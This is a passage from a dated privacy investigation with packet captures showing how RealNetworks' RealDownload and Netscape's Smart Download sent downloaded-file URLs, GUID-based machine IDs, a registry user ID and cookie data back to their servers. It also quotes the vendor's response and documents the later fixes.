      She explained that she had just learned that the last 24 characters of the "downloadid"'s 32-characters, were derived from a Windows GUID. 

      "GUID" stands for "Globally Unique IDentifier" and is a technology standard specified by the Open Software Foundation (OSF) to create unique and non-repeating "ID Tags".
      Such "ID Tags" are generated once then stored, typically in the Windows Registry.

      If you're really curious, use the Windows "RegEdit" program to look under this key name: HKEY_CLASSES_ROOT\CLSID and you'll see a billion GUID's (Don't change anything!)

      In the past, the use of GUID's has aroused the wrath and concern of privacy advocates the world over, since they are like "serial numbers" which can be used to uniquely
      identify software users. 


      Okay. So now we know how and where RealNetworks gets the last 24-characters of their 'downloadid'. It is a non-changing unique identifier, different for every computer. Today,
      they may not like the fact that their use of a deliberately unique and fixed identifier has severe privacy overtones, nor that they have been caught in an outright lie about their
      use of an identifier which is being transmitted and could be used to track the software download habits of their RealDownload users. But I never expected that forcing them to
      publicly confess the truth would make them particularly happy.

      downloadid=9B145049 / 5BF211D4A025002018252799

      It appears to be quite likely that the first eight characters are a hexadecimal representation of a 32-bit binary quantity that is incremented for every download   that, in any
      event, is the behavior I witnessed. So the first portion which appears to be incremented for each download functions like a "download session ID". Whereas the last 24
      characters are exactly what I have always asserted: A "download machine ID." Together, they create a deliberately concocted, unique identifier, which, when transmitted from
      any user's computer could be used to track their users' download behavior over time and to assemble a download profiling database. 

      Tuesday,
      July 18
      
      Things were much quieter today. I was told that RealNetworks staff was "in meetings" most of the day. 

      Then, at the end of this long day of "meetings"   which were apparently spent carefully wording the following document   RealNetworks produced this formal statement: 

      REALNETWORKS PRIVACY STATEMENT 7/18/00

      In response to recent questions regarding certain technical functions of its RealDownload product, RealNetworks today issued the following statement: 

      "We emphatically disagree with the implications raised by certain members of the technical community about the behavior or planned behavior of RealDownload. To be clear:
      RealDownload does not transmit personally identifiable user information to RealNetworks without informed consent. It does not monitor users behavior and it does not log
      download URL information. Because we do not log download URL information and the product does not transmit registration information identifying the RealDownload user, we
      cannot and do not store download URLs with personal information   and we never have. 

      "We work very hard to ensure that our products comply with all of our privacy policies. We have even taken the extra step of hiring Arthur Andersen to independently review
      our compliance with our own strict privacy policies. Through its eSure audit program, Arthur Andersen has independently verified that RealNetworks does not store URLs
      transmitted from the RealDownload product. 

      "Because of the way RealDownload interoperates with the APIs of certain versions of the Windows operating system, it creates for each download a new, 32-character code
      that does not contain any personal information, but apparently does not fully randomize during each download. Now that we are aware of this technical issue, and because
      the 32-character code serves no purpose, we are removing it from forthcoming versions of RealDownload. 

      "As the leader in the delivery of Internet media, we at RealNetworks set for ourselves and will adhere to the highest privacy standards. We appreciate the ongoing diligence
      of privacy experts and we will continue to develop RealNetworks products in a manner that respects customers privacy." 



      Tuesday Evening . . . 

                                                                  July 18   ZDTV's Leo Laporte and I discuss the
                                                                     current situation on Leo's ScreenSavers show.
                                                                      Are you being watched when you download?



       Wednesday,
       July 19
       
       Regarding RealNetworks' Statement: 

       Since I am in the hot seat here, being the "certain members of the technical community" who has "raised implications", the world will be looking for my reaction to this
       statement from RealNetworks. I received their statement first from RealNetworks directly, then subsequently from several members of the media. Everyone has wanted my
       reaction. Here it is: 

         I am unconcerned and unimpressed with most of RealNetworks' Statement. They specifically failed to address the reason for the presence of the "insufficiently random"
         32-character code whose very existence they had previously denied emphatically. I am, however, pleased to learn that they have decided that it now "serves no purpose"
         and will forthwith be removed from the product. The sooner the better for everyone involved.



       We are still left with what is, arguably, a much bigger problem: The undeniable transmission of personal and private "personally identifiable" information as a direct consequence of
       the use of RealDownload. See the full technical 'dissection' below . . . 

       Thursday,
       July 20
       
       Everything I hear from RealNetworks indicates that they are taking every issue I have raised on this page very seriously . . . and not just paying them lip-service, but really
       doing something quickly: 

       I am told   but have not yet verified   that the opportunity for the significant "personally identifiable" information leakage has already been fixed. That's got to be a
       record   I only published my discovery of it this morning! 

                                                             WHOOPS! Spoke too soon. NOT
                                                              FIXED as of end of day Friday!

       As I detail below, the potential breach arose from RealDownload images being served from the eCommerce site's domain, thus exposing an eCommerce derived cookie
       during a RealDownload transaction. But since the image URL's were being provided on-the-fly by the RealDownload server, their source server could be changed with no
       change to the product. By serving the RealDownload images from the RealDownload (non-commerce) server, eCommerce cookie disclosures will no longer be triggered. 

       Tomorrow I will verify that this is, in fact, now happening. 

       We are still left with the problem of RealNetworks' storage and transmission "in plaintext form" of information which was received by them over a secure connection. I will
       publish an analysis and discussion of this issue tomorrow. 

       I am told that RealNetworks may release a new version of RealDownload tomorrow . . . thus breaking another retooling speed record. So we might soon have a new version
       of RealDownload that does not, and can not send unique "per-computer" identifiers back to RealNetworks' servers. 

        Any Internet server is typically able to determine the Internet (IP) address of a connected client   such as the user's computer when it sends a file download report.
        That's how my own 'ShieldsUp' security testing system operates. Therefore, RealDownload users who are extremely security conscious, and who have non-dynamic IP
        addresses (most non-dial up users) may still desire to disable RealDownload's "per file" reporting function so that all "per-download" reporting is disabled.


       We'll see what tomorrow brings. Things are looking up.  

       Friday,
       July 21
                                                                                             July 21   RealNetworks Inc. admitted today its
                                                                                              RealDownload software could be used to track
                                                                                                 specific users exact download habits.
                                                                                                http://www.msnbc.com/news/436070.asp



        My determination to dig out the WHOLE truth takes an unexpected turn today. Curious about the fact that the size of a full Windows GUID is exactly the same as the size of
        RealNetworks' infamous 'downloadid', I write my own little program to request GUIDs from the Windows operating environment. Running this program three times on the same
        computer which performed Monday's results, generates the following three GUIDs: 

                                                           Three Successive Windows GUIDs WITHOUT reboots

                                                            GUID = CCDE2D405EF811D4A025002018252799
                                                            GUID = CCDE2D415EF811D4A025002018252799
                                                            GUID = CCDE2D425EF811D4A025002018252799




        Notice that, EXACTLY like the three successive downloadids generated by RealDownload on Monday, these GUIDs differ from each other in exactly one character, that
        this character is counting, and most significantly, the LAST 20 CHARACTERS of the GUIDs I generated exactly match the tail of the 'downloadid':

                                                              GUID = CCDE2D405EF8 11D4A025002018252799
                                                        downloadid = 9B1450495BF2 11D4A025002018252799


        Next, I use my GUID-maker program to generate three GUIDs, but I restart Windows each time: 

                                                                 Three Windows GUIDs WITH REBOOTS

                                                            GUID = A7F1BFC05FD811D4A025002018252799
                                                            GUID = 39CC01805FD911D4A025002018252799
                                                            GUID = 8ADA6EE05FD911D4A025002018252799




        We see that the first 12 characters of the GUIDs are different (especially the first eight), whereas the 20 character GUID tail is absolutely constant, even across reboots of a
        single system. 

        Network adapters are designed to possess "globally unique" MAC addresses in order to prevent physical address collisions when communicating across a local network segment.
        This means that Network adapter MAC addresses are a good source for some guaranteed-to-be-unique "bits". Therefore, the Open Software Foundation's (OSF) GUID creation
        scheme incorporates the machine's LAN adapter MAC address, when available, into the GUIDs creation. Since the tests have so far been conducted on a networked machine with
        a LAN adapter, the next logical step would be to perform them on a machine without a network card: 

                                                                 Three Windows GUIDs WITH REBOOTS
                                                                   and NO LAN Adapter MAC Address

                                                            GUID = 7A9196805FE811D4BA1DA6C968FAE763
                                                            GUID = 147026E05FE911D4BA1D8FF112DACE63
                                                            GUID = 9C1C35205FE911D4BA1DA55166FEC463




        As you can see above, without a LAN adapter's static MAC address available, the situation again changes. Now a region in the center of the the GUIDs is static across GUID
        generation and across reboots, but the last 12 characters, which had previously never changed, are now very different after each reboot. 




        So What Does it All Mean? 

        It means this is a big mess. All of the evidence indicates that RealNetworks' 'downloadid' actually is nothing more or less than a standard Windows GUID. 

                                                             downloadid == GUID

        The RealNetworks technical manager told me, Monday, that the last 24 characters of their 'downloadid' were "derived from" a Windows GUID. And while I suppose that's
        technically correct, it's a bit misleading, since I am now virtually certain that their 'downloadid' is exactly and without 'derivation' a Windows GUID. 

                                                          "Huh? They're using dynamically generated
                                                           Windows GUIDs as their download IDs?"

        Yeah . . . I know . . . It is a really weird and dumb thing to do: 

        As we have clearly seen, it is not reliably static enough to use as a trustworthy per-computer identifier, yet it is one, sort of, most of the time, maybe. But neither is it
        random enough to be used as an opaque per-transaction identifier (as I believe it was intended) without the serious privacy concerns that I originally raised. 

        Here's exactly what I believe happened: 

        The copy of NetZip's Download Demon I analyzed exhibits precisely the same behavior at RealNetworks' RealDownload. Therefore, I believe that prior to RealNetworks' acquisition
        of Download Demon from NetZip, some programmer at NetZip wasn't the least bit concerned about privacy issues. (This is certainly still more the rule than the exception today.)
        So this programmer innocently uses a Windows GUID as a convenient unique tag for their Demon's transaction tracking. This programmer never stops to consider, if he or she even
        knew, that the GUID contains   by design and specification   the machine's absolutely unique LAN adapter MAC address, or some other relatively invariant machine-specific
        tagging information if the system has no LAN card. 

        Next, RealNetworks apparently commits two blunders: 

           They employ Arthur Andersen to provide a third-party blessing of a second-party product. Since I doubt that the folks from Arthur Andersen are grossly incompetent, it can
           only be that they don't really care about, or understand, the nature and requirements for personal privacy. They put the Arthur Andersen eSeal of Approval on a product
           which is not only sending a unique identifier, but managing to transmit its user's unique MAC adapter address across the Internet while intimately associating it with every
           file download. Yikes!

           RealNetworks, for its part, either didn't perform its own effective or useful code review on a second-party acquired product, or it, too, is not sufficiently aware of the
           requirements for personal privacy. Oh sure, RealNetworks has license agreements, privacy policies, and rampaging lawyers galore, but its actual products suffer time and
           again from significant privacy concerns. 


        RealNetworks has, undeniably, fumbled their acquisition of Download Demon and the release of RealDownload, but . . .

                                                                A completely fair reading of the
                                                             evidence suggests that RealNetworks
                                                           never meant to violate anyone's privacy.

        And, significantly, this is absolutely different from the conclusion I would draw from the design of Netscape's superficially similar Smart Download product. As you will see below,
        Smart Download creates an ID Tag in the registry of any machine it's installed on and transmits that Tag with every file download report. 

        Tuesday,
        July 25
        
        CONFIRMED: The currently downloadable new version of RealDownload omits the infamous downloadid from its "phoning home" per-file download reports. The reports
        (enabled by default) continue to be sent, but any user-tracking would be much less accurate now, needing to be based upon the user's potentially dynamic IP address. ("Phoning
        home" is a fundamentally non-private action for any Internet software.) 

        CONFIRMED: Previous version(s) of RealDownload continue to retrieve images from RealNetworks' eCommerce server domain. RealNetworks customers who received an
        insecure personal cookie containing their name and address, will have this private and personally identifiable information transmitted as a result of the use of previous version(s) of
        RealDownload. I was told this privacy breach would be eliminated five days ago . . . yet it continues. 


        To Summarize before we examine the details . . . 

        In order to confirm or deny the reports alleging that the Real Networks and Netscape/AOL download utilities might be spying on their users by secretly "phoning home" with detailed reports of every file their users
        download, I used a readily available "packet sniffer" to monitor the data being sent from one of my machines when downloading a handful of my own website's files. 

        I was able to quickly confirm that the NetZip-descended downloaders used by Real Networks and Netscape/AOL were, indeed, sending detailed reports of every download "back to base" every time they were used to
        download a file. 

        These reports contained the complete Internet URL of the file being downloaded and were accompanied by an apparently unique "ID Tag" which was associated with each machine. To confirm this, I experimented with
        downloads from several different computers. In every case the "apparently unique ID" being sent out never changed on the same computer, and each computer has its own. 

        Netscape's Smart Download goes one step further by including the computer's IP address in a separate "cookie" header. This is troubling, since "cookie" headers tend to be left alone as they pass through proxies and
        anonymizers. This would thwart deliberate attempts at keeping the computer's IP address confidential. 

        When you consider that each user's computer is uniquely identified, and that reports are being sent back for every file downloaded   and accompanied by a unique ID tag (and, in the case of Netscape, the machine's
        unique IP address) . . . 

                                                                    . . . It is NATURAL to wonder WHY
                                                                   this information is being transmitted,
                                                                 and to what end the data is being put!




        Dissecting RealDownload's Packet Traffic 

        After installing RealNetworks' RealDownload utility, I clicked on a web link to download the file "id.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out of my computer to
        one of Real's servers: 


                                                        MAC source address: 00-20-18-25-27-99
                                                        MAC dest address:   00-90-7F-01-21-E8
                                                        Frame type:         IP
                                                        Protocol:           TCP->HTTP
                                                        Source IP address:  207.71.92.206
                                                        Dest IP address:    207.188.30.49
                                                        Source port:        1107
                                                        Destination port:   80
                                                        SEQ:                3073973
                                                        ACK:                169605441
                                                        Packet size:        417

                                                        Packet data:
                                                        0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
                                                        0010:  01 93 1C 0A 00 00 40 06 43 58 CF 47 5C CE CF BC ......@.CX.G\...
                                                        0020:  1E 31 04 53 00 50 00 2E E7 B5 0A 1B F9 41 50 18 .1.S.P.......AP.
                                                        0030:  FF FF 44 5A 00 00 47 45 54 20 2F 73 61 32 2E 61 ..DZ..GET /sa2.a
                                                        0040:  73 70 3F 70 72 6F 64 75 63 74 3D 52 65 61 6C 44 sp?product=RealD
                                                        0050:  6F 77 6E 6C 6F 61 64 26 76 65 72 73 69 6F 6E 3D ownload&version=
                                                        0060:  34 2E 30 2E 30 2E 31 38 26 70 6C 61 74 66 6F 72 4.0.0.18&platfor
                                                        0070:  6D 3D 57 69 6E 39 38 26 65 76 65 6E 74 3D 64 6F m=Win98&event=do
                                                        0080:  77 6E 6C 6F 61 64 53 74 61 72 74 26 75 72 6C 3D wnloadStart&url=
                                                        0090:  68 74 74 70 25 33 41 25 32 46 25 32 46 67 72 63 http%3A%2F%2Fgrc
                                                        00A0:  2E 63 6F 6D 25 32 46 66 69 6C 65 73 25 32 46 69 .com%2Ffiles%2Fi
                                                        00B0:  64 2E 7A 69 70 26 72 65 66 75 72 6C 3D 67 72 63 d.zip&refurl=grc
                                                        00C0:  2E 63 6F 6D 26 66 69 6C 65 73 69 7A 65 3D 31 32 .com&filesize=12
                                                        00D0:  33 32 38 26 6D 69 6D 65 3D 61 70 70 6C 69 63 61 328&mime=applica
                                                        00E0:  74 69 6F 6E 25 32 46 7A 69 70 26 70 65 72 63 65 tion%2Fzip&perce
                                                        00F0:  6E 74 3D 30 26 64 6F 77 6E 6C 6F 61 64 69 64 3D nt=0&downloadid=
                                                        0100:  39 42 31 34 35 30 34 39 35 42 46 32 31 31 44 34 9B1450495BF211D4
                                                        0110:  41 30 32 35 30 30 32 30 31 38 32 35 32 37 39 39 A025002018252799
                                                        0120:  26 73 62 69 64 3D 26 73 70 6F 6E 73 6F 72 3D 72 &sbid=&sponsor=r
                                                        0130:  64 62 61 73 69 63 20 48 54 54 50 2F 31 2E 30 0D dbasic HTTP/1.0.
                                                        0140:  0A 48 6F 73 74 3A 20 73 61 2E 6E 65 74 7A 69 70 .Host: sa.netzip
                                                        0150:  2E 63 6F 6D 0D 0A 41 63 63 65 70 74 3A 20 2A 2F .com..Accept: */
                                                        0160:  2A 0D 0A 43 6F 6F 6B 69 65 3A 20 4C 61 73 74 49 *..Cookie: LastI
                                                        0170:  6E 66 6F 49 44 3D 31 30 30 32 3B 73 62 69 72 73 nfoID=1002;sbirs
                                                        0180:  68 61 72 65 3D 72 64 62 61 73 69 63 0D 0A 52 61 hare=rdbasic..Ra
                                                        0190:  6E 67 65 3A 20 62 79 74 65 73 3D 30 2D 0D 0A 0D nge: bytes=0-...
                                                        01A0:  0A




        This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into
        individual lines (at the '&' delimiter), and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" being given to
        RealNetworks' server, is: 

                                                                   GET /sa2.asp?
                                                                   product=RealDownload
                                                                   version=4.0.0.18
                                                                   platform=Win98
                                                                   event=downloadStart
                                                                   url=http://grc.com/files/id.zip
                                                                   refurl=grc.com
                                                                   filesize=12328
                                                                   mime=application/zip
                                                                   percent=0
                                                                   downloadid=9B1450495BF211D4A025002018252799
                                                                   sbid=
                                                                   sponsor=rdbasic
                                                                   HTTP/1.0



        The balance of the data transmitted consists of the additional information "parameters" shown below: 


                                                                    Host:   sa.netzip.com
                                                                    Accept: */*
                                                                    Cookie: LastInfoID=1002;sbirshare=rdbasic
                                                                    Range:  bytes=0-



        So, what does the data analysis show us? 

           The complete URL of the file I downloaded was sent to the receiving server: "url=http://grc.com/files/id.exe". The receiving server thus knows the location and full filename of the link I clicked on
           to download.

           My machine and I have been "tagged" by the compound "Key" of: 

                                                                            9B1450495BF211D4A025002018252799

           Which can be broken into its two component parts: 

                                                                           9B145049   5BF211D4A025002018252799

           The left chunk is a "counter" which appears to be incremented once for every file downloaded. I believe that this serves as a "session ID" to separate and identify individual downloads being
           conducted by a single computer. 

           The right-hand chunk is the "computer ID" which is, according to RealNetworks, based upon a Globally Unique ID (GUID) and is used to uniquely identify the computer into which RealDownload
           has been installed. 




                                                                     The Big Bad Boondoggle...




        When I was re-examining the RealDownload system on Monday, July 17th, something caught my eye that I had missed on the previous Friday: 

                                                                 My full name, and the private eMail alias I always use
                                                              for on-line purchases, was sent out of my computer to one
                                                           of Real's servers when I downloaded a file using RealDownload.

        RealNetworks' repetitious assertions that it is NOT POSSIBLE for them to associate our RealDownload mediated downloads with our actual identity, or that no "personally identifiable information" is
        transmitted without our informed consent, appear to be no more correct than their previous assertions about the lack of RealDownload's ID tagging. 

        Just so we're really clear here: I am NOT alleging that RealNetworks IS making this association. I have no evidence of that one way or the other. But I AM proving that they absolutely COULD if
        they chose to. Furthermore, for some reason which is not known to me, they have repeatedly stated that they CAN NOT. 


                                                        MAC source address: 00-20-18-25-27-99
                                                        MAC dest address:   00-90-7F-01-21-E8
                                                        Frame type:         IP
                                                        Protocol:           TCP->HTTP
                                                        Source IP address:  207.71.92.206
                                                        Dest IP address:    208.147.89.135
                                                        Source port:        1108
                                                        Destination port:   80
                                                        SEQ:                3074088
                                                        ACK:                3078494647
                                                        Packet size:        339

                                                        Packet data:
                                                        0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
                                                        0010:  01 45 1E 0A 00 00 40 06 05 79 CF 47 5C CE D0 93 .E....@..y.G\...
                                                        0020:  59 87 04 54 00 50 00 2E E8 28 B7 7E 19 B7 50 18 Y..T.P...(....P.
                                                        0030:  FF FF 05 FB 00 00 47 45 54 20 2F 61 64 73 2F 68 ......GET /ads/h
                                                        0040:  6F 75 73 65 5F 6A 75 6B 65 62 6F 78 31 2E 67 69 ouse_jukebox1.gi
                                                        0050:  66 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 f HTTP/1.1..Acce
                                                        0060:  70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
                                                        0070:  4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
                                                        0080:  0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
                                                        0090:  3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
                                                        00A0:  0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A .User-Agent: Moz
                                                        00B0:  69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 illa/4.0 (compat
                                                        00C0:  69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 3B 20 ible; MSIE 5.0; 
                                                        00D0:  57 69 6E 64 6F 77 73 20 39 38 3B 20 44 69 67 45 Windows 98; DigE
                                                        00E0:  78 74 29 0D 0A 43 6F 6F 6B 69 65 3A 20 52 4E 45 xt)..Cookie: RNE
                                                        00F0:  63 6F 6D 6D 3D 76 65 72 32 2E 30 7C ?? ?? ?? ?? comm=ver2.0|xxxx
                                                        0100:  ?? ?? ?? ?? ?? ?? ?? ?? ?? 7C 53 74 65 76 65 7C xxxxxxxxx|Steve|
                                                        0110:  47 69 62 73 6F 6E 7C 4F 46 46 7C 39 58 33 47 38 Gibson|OFF|9X3G8
                                                        0120:  0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 ..Connection: Ke
                                                        0130:  65 70 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 ep-Alive..Host: 
                                                        0140:  69 6D 61 67 65 73 2E 72 65 61 6C 2E 63 6F 6D 0D images.real.com.
                                                        0150:  0A 0D 0A                                        ...




        As before, we can easily break this rather intimidating looking hexadecimal data block into its much more easily readable header lines: 


                                                          GET /ads/house_jukebox1.gif HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
                                                          Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8
                                                          Connection: Keep-Alive
                                                          Host: images.real.com



        The "Cookie" header line (shown above) which is present in the outbound transmission to one of RealNetworks' servers   a transmission which was triggered by my use of RealDownload   not
        only demonstrates that RealNetworks has again misrepresented their capabilities, if not their actions and intentions, but also that they are careless in the extreme with their customer's personal and
        private data:

                                                           Cookie: RNEcomm=ver2.0|xxxxxxxxxxxxxxxxxx|Steve|Gibson|OFF|9X3G8

        Breaking this down with the benefit of what the RealNetworks technical manager told me: 

           I am guessing that the "RNEcomm=ver2.0" string stands for "Real Networks Electronic Commerce version 2.0".

           The string of 'xxxxxxxxxxxxxxxxxx' shown above was, when captured on its way out of my computer, my personal and private eMail address alias which would have been used during an online
           eCommerce purchase. I hope that you (the reader) will understand that I desire to protect its privacy here even if RealNetworks hasn't.

           The next two fields: "Steve" and "Gibson" are rather clear. If this isn't "personally identifiable information" being sent during the use of RealDownload, I can't imagine what would be.

           I can't guess what the last two fields: "OFF" and "9X3G8" might refer to. But logic would indicate that the "9X3G8" is an identifier which refers in some way to my past purchase of "Real
           Producer" which the RealNetworks technical manager concluded was the event which planted this very persistent cookie onto my computer for subsequent re-transmission at various odd (and in
           some cases potentially awkward   and certainly non-anonymous) moments . . . such as whenever using their supposedly anonymous RealDownload agent.


        You will notice that the server ("Host:") to which the offending Cookie was sent appears to be 'images.real.com'. This is a different server, at a different Internet IP address, from the one which
        received RealDownload's file download report. However, Internet server-clustering technologies, for aggregating data across disparate servers, are readily available, and we would expect a company
        like RealNetworks to be at the forefront of such bandwidth management technology. Thus the fact that the information was sent to different servers does not prevent its ready association. 

        Because this represents an extremely great concern for all of us, and especially for privacy advocates, I want to be very clear again that I am not alleging that such associating of these two
        separate communications IS being done, but only that RealNetworks' repeated assertion that it COULD NOT BE DONE, appears to be patently false. 




        Dissecting Smart Download's Packet Traffic 

        After installing Netscape's Smart Download utility, I clicked on a web link to download the file "tip.exe" from my server at "grc.com". The following TCP/IP data packet was immediately sent out
        of my computer to one of Netscape's servers: 


                                                        MAC source address: 00-20-18-25-27-99
                                                        MAC dest address:   00-90-7F-01-21-E8
                                                        Frame type:         IP
                                                        Protocol:           TCP->HTTP
                                                        Source IP address:  207.71.92.206
                                                        Dest IP address:    207.200.75.206
                                                        Source port:        1041
                                                        Destination port:   80
                                                        SEQ:                330513
                                                        ACK:                750466305
                                                        Packet size:        450

                                                        Packet data:
                                                        0000:  00 90 7F 01 21 E8 00 20 18 25 27 99 08 00 45 00 ....!.. .%'...E.
                                                        0010:  01 B4 9C 00 40 00 80 06 15 97 CF 47 5C CE CF C8 ....@......G\...
                                                        0020:  4B CE 04 11 00 50 00 05 0B 11 2C BB 35 01 50 18 K....P....,.5.P.
                                                        0030:  22 38 44 F5 00 00 47 45 54 20 2F 63 67 69 2D 62 "8D...GET /cgi-b
                                                        0040:  69 6E 2F 73 64 5F 73 65 72 76 65 72 2E 63 67 69 in/sd_server.cgi
                                                        0050:  3F 70 6C 61 74 66 6F 72 6D 3D 77 69 6E 39 38 26 ?platform=win98&
                                                        0060:  76 65 72 73 69 6F 6E 3D 31 2C 2B 31 2C 2B 30 2C version=1,+1,+0,
                                                        0070:  2B 36 36 26 75 72 6C 3D 68 74 74 70 25 33 41 25 +66&url=http%3A%
                                                        0080:  32 46 25 32 46 67 72 63 2E 63 6F 6D 25 32 46 66 2F%2Fgrc.com%2Ff
                                                        0090:  69 6C 65 73 25 32 46 74 69 70 2E 65 78 65 26 4B iles%2Ftip.exe&K
                                                        00A0:  65 79 3D 42 52 55 4E 4F 33 39 36 44 46 32 37 33 ey=BRUNO396DF273
                                                        00B0:  20 48 54 54 50 2F 31 2E 30 0D 0A 50 72 61 67 6D  HTTP/1.0..Pragm
                                                        00C0:  61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 43 6F 6E a: no-cache..Con
                                                        00D0:  6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C nection: Keep-Al
                                                        00E0:  69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ive..User-Agent:
                                                        00F0:  20 4E 65 74 5A 69 70 2D 44 6F 77 6E 6C 6F 61 64  NetZip-Download
                                                        0100:  65 72 2F 31 2E 30 2E 36 32 20 28 57 69 6E 33 32 er/1.0.62 (Win32
                                                        0110:  3B 20 44 65 63 20 20 37 20 31 39 39 38 29 0D 0A ; Dec  7 1998)..
                                                        0120:  48 6F 73 74 3A 20 63 67 69 2E 6E 65 74 73 63 61 Host: cgi.netsca
                                                        0130:  70 65 2E 63 6F 6D 3A 38 30 0D 0A 52 61 6E 67 65 pe.com:80..Range
                                                        0140:  3A 20 62 79 74 65 73 3D 30 2D 0D 0A 41 63 63 65 : bytes=0-..Acce
                                                        0150:  70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
                                                        0160:  4C 61 6E 67 75 61 67 65 3A 20 65 6E 0D 0A 41 63 Language: en..Ac
                                                        0170:  63 65 70 74 2D 43 68 61 72 73 65 74 3A 20 69 73 cept-Charset: is
                                                        0180:  6F 2D 38 38 35 39 2D 31 2C 2A 2C 75 74 66 2D 38 o-8859-1,*,utf-8
                                                        0190:  0D 0A 43 6F 6F 6B 69 65 3A 20 55 49 44 43 3D 32 ..Cookie: UIDC=2
                                                        01A0:  30 37 2E 37 31 2E 39 32 2E 32 30 36 3A 30 39 36 07.71.92.206:096
                                                        01B0:  33 35 33 33 30 30 32 3A 32 33 38 32 31 31 0D 0A 3533002:238211..
                                                        01C0:  0D 0A




        This rather intimidating looking hexadecimal data block (above) can be easily "parsed" into something far more intelligible. Breaking the block of ASCII text (over in the right hand column) into
        individual lines, and translating the "URL Encoding" (those %3A and %2F which mean ":" and "/" respectively), the first long line we see, which is the "command" given to the Netscape server, is: 

                                                                    GET /cgi-bin/sd_server.cgi?platform=win98
                                                                     &version=1,+1,+0,+66&url=http://grc.com/
                                                                     files/tip.exe&Key=BRUNO396DF273 HTTP/1.0

        This long line can then be further broken down into its various components: 

                                                                         GET /cgi-bin/sd_server.cgi
                                                                         platform=win98
                                                                         version=1,+1,+0,+66
                                                                         url=http://grc.com/files/tip.exe
                                                                         Key=BRUNO396DF273 
                                                                         HTTP/1.0



        The balance of the data transmitted consists of the additional information "parameters" shown below: 


                                                          Pragma:          no-cache
                                                          Connection:      Keep-Alive
                                                          User-Agent:      NetZip-Downloader/1.0.62(Win32;Dec 7 1998)
                                                          Host:            cgi.netscape.com:80
                                                          Range:           bytes=0-
                                                          Accept:          */*
                                                          Accept-Language: en
                                                          Accept-Charset:  iso-8859-1,*,utf-8
                                                          Cookie:          UIDC=207.71.92.206:0963533002:238211



        So, what does the data analysis show us? 

           The complete URL of the file I downloaded was sent to Netscape: "url=http://grc.com/files/tip.exe". Netscape thus knows what site I was visiting and what file(s) I clicked on to download.

           My machine and I have been "tagged" by the "Key" of: "BRUNO396DF273" 

           Interestingly, "Bruno" is the name of the machine I used for this testing. So, the machine's name is being sent as part of my "ID". Also, I performed this experiment SEVERAL TIMES, shutting
           down the machine and rebooting . . . and the key's value never changed. Thus, it is clearly serving as a "persistent tag" and is being used to uniquely identify me from one use of the download
           utility to the next.

           After seeing the "BRUNO396DF273" tag being sent, I searched the Windows Registry for that tag string. I found it in my machine's Registry at:

                                                                HKEY_LOCAL_MACHINE\Software\Nsda\1.1\Options\UserID

           This makes it pretty clear that the tag is, indeed, a persistent "UserID" (by their own label) which has been assigned to my machine for the purpose of long-term, unique, identification. 

           Note that any time Netscape (or anyone else) ever wants to, they could access that public registry key and immediately tie me, and this machine, to my entire past download history. 

           IMPORTANT!: Users of Netscape's Smart Download utility, who unwittingly joined Netscape's "NetCenter" system, are especially at risk of privacy violation because NetCenter members also
           have their NetCenter logon ID and their personal eMail address sent with each file download report! 

           So much for never including any "personally identifiable" information. This means that the user's NetCenter logon ID   many people simply use their names   and eMail address are both being
           transmitted along with the name of every file downloaded by Smart Download. 

           And finally ... check out the "Cookie" field that is being sent! (It is the last field of the last group above.) The glob at the end includes encoded date and time information, but immediately after
           the "UIDC=" is my machine's IP address!! So Netscape apparently thought that would be a good thing for them to have also. 

           Since it's in a "cookie" field, it will pass through "anonymizers", "proxies", and NAT routers, which would otherwise obscure the user's true IP address. In other words, since the machine's own IP
           address has been included in this "cookie", using the Internet through an "IP anonymizing service" will NOT prevent Netscape/AOL from learning the machine's TRUE IP. Netscape receives it
           directly from their software running in the user's computer. 





        In Summary . . . 

                                                                             So what does it all mean?

        I am not a Netscape or RealNetworks programmer, so I can only go by the evidence presented through an analysis of the available data. I've read the "fine print" of their various license
        agreements carefully several times, and I've examined their online FAQ pages. There seems to be no question that by "agreeing" to the license, the user allows these companies to gather any sort of
        data they desire. The licenses seem strangely self-contradictory and quite unclear about what is being collected, stored, retained, compiled, used . . . and what is not, and why. 

          A close reading of the NetZip Download Demon license reveals an assertion interestingly absent from the otherwise very similar RealDownload license: 

                                                                    "No unique identifier or any personally identifiable
                                                                        information is sent with this information;"

          It would appear that someone at RealNetworks realized that NetZip's license had always been misleading its 14 million users, since a "unique identifier" was, in fact, always being sent along with
          the file download information. As a result, did RealNetworks remove the identifier?  No.  From their version of the NetZip license, RealNetworks simply removed the assertion that there was no
          identifier. 

          Yet these are the same people who are asking us to trust them with the fact that they could be recording the name and location of every single file we download through the Internet? . . . which
          is clearly tagged with our unique ID and with our machine's IP address?



        For most people, the main issue revolves around whether or not a report of every file downloaded with those utilities is transmitted back to their home base . . . and there's just no question any
        longer that unless deliberately disabled by the user, this is being actively done. If that bothers you, you may wish to immediately remove these downloading tools from your system. 

